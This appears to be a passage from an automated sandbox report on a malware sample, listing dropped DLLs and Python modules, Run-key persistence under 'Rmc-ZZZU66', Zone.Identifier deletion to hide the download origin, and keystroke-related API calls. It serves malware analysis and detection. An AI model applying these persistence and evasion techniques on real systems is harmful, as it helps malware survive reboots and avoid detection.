                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43482\_sqlite3.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43482\_hashlib.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI35882\rar.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-core-file-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI35882\_decimal.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI35882\_queue.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI35882\libssl-3.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI35882\unicodedata.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43482\libcrypto-3.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-console-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43482\sqlite3.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
                        Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\DE5A.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43482\VCRUNTIME140.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI35882\_hashlib.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-core-util-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-util-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI35882\_socket.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-core-file-l2-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-file-l2-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-core-string-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43482\rar.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43482\_queue.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-core-console-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43482\_lzma.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43482\_decimal.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI35882\select.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43482\libffi-8.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43482\_socket.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-file-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI35882\libcrypto-3.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI35882\sqlite3.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43482\unicodedata.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI35882\_sqlite3.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43482\ucrtbase.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI35882\_lzma.pydJump to dropped file
                        Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\wsruwiiJump to dropped file

                        Boot Survival

                        barindex
                        Creates autostart registry keys with suspicious names
                        Source: C:\Users\user\AppData\Local\Temp\bound.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Rmc-ZZZU66
                        Source: C:\Users\user\AppData\Local\Temp\bound.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Rmc-ZZZU66
                        Source: C:\Users\user\AppData\Local\Temp\bound.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Rmc-ZZZU66
                        Source: C:\Users\user\AppData\Local\Temp\bound.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Rmc-ZZZU66
                        Source: C:\Users\user\AppData\Local\Temp\bound.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Rmc-ZZZU66

                        Hooking and other Techniques for Hiding and Protection

                        barindex
                        Hides that the sample has been downloaded from the Internet (zone.identifier)
                        Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\wsruwii:Zone.Identifier read attributes | deleteJump to behavior
                        Loading BitLocker PowerShell Module
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_00A226DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,10_2_00A226DD
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_009AFC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,10_2_009AFC7C
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 13_2_00A226DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,13_2_00A226DD
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 13_2_009AFC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,13_2_009AFC7C
                        Source: C:\Users\user\AppData\Roaming\wsruwiiCode function: 20_2_001D26DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,20_2_001D26DD
                        Source: C:\Users\user\AppData\Roaming\wsruwiiCode function: 20_2_0015FC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,20_2_0015FC7C
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 21_2_00007FF6C99C53F0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,21_2_00007FF6C99C53F0
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                        Source: C:\Users\user\AppData\Roaming\wsruwiiRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                        Source: C:\Users\user\AppData\Roaming\wsruwiiRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                        Source: C:\Users\user\AppData\Roaming\wsruwiiRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\wsruwiiProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\wsruwiiProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\wsruwiiProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\wsruwiiProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\wsruwiiProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\wsruwiiProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\wsruwiiProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\wsruwiiProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\wsruwiiProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\wsruwiiProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\wsruwiiProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\wsruwiiProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\wsruwiiProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\wsruwiiProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\wsruwiiProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
